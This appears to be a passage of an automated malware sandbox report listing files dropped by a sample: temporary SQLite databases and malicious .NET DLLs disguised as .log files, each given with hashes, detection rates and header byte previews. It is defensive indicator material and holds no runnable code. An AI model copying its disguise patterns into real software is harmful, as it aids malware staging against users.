Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\yYonXqCdnp

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\yjygUhaCx5

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ywkPqc88oq

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\yyncc7WJ1Q

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\zF5T49bS6f

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\zJyw5wilMN

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\zT3f06aISQ

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\zom6ALEek8

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\zxyq1dsFGb

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\AtVzwBvZ.log

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	89600
Entropy (8bit):	5.905167202474779
Encrypted:	false
SSDEEP:	1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
MD5:	06442F43E1001D860C8A19A752F19085
SHA1:	9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
SHA-256:	6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
SHA-512:	3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 16%
Joe Sandbox View:	Filename: DWTukBG9R7.exe, Detection: malicious, Browse Filename: CPNSQusnwC.exe, Detection: malicious, Browse Filename: xoCq1tvPcm.exe, Detection: malicious, Browse Filename: Dfim58cp4J.exe, Detection: malicious, Browse Filename: eu6OEBpBCI.exe, Detection: malicious, Browse Filename: IYXE4Uz61k.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: gorkmTnChA.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

C:\Users\user\Desktop\BmbzgENi.log

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\BqwHRBKU.log

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	28160
Entropy (8bit):	5.570953308352568
Encrypted:	false
SSDEEP:	384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
MD5:	A4F19ADB89F8D88DBDF103878CF31608
SHA1:	46267F43F0188DFD3248C18F07A46448D909BF9B
SHA-256:	D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
SHA-512:	23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\CEfhBXTR.log

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\DCGpXXhM.log

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\FkBISkog.log

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.529329139831718
Encrypted:	false
SSDEEP:	384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
MD5:	8AE2B8FA17C9C4D99F76693A627307D9
SHA1:	7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
SHA-256:	0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
SHA-512:	DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\GidQnkDb.log

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24064
Entropy (8bit):	5.492504448438552
Encrypted:	false
SSDEEP:	384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
MD5:	0EEEA1569C7E3EBBB530E8287D7ADCF9
SHA1:	3C196FA10144566EBFBEE7243313314094F3A983
SHA-256:	57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
SHA-512:	1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 33%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\HAgyIDIK.log

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\HjZguhPI.log

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.41854385721431
Encrypted:	false
SSDEEP:	384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
MD5:	BBDE7073BAAC996447F749992D65FFBA
SHA1:	2DA17B715689186ABEE25419A59C280800F7EDDE
SHA-256:	1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
SHA-512:	0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\HrJyYQpO.log

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\IZCgKuwL.log

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\JXdofuLG.log

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\JkPyJTHW.log

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\KYTGugDU.log

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
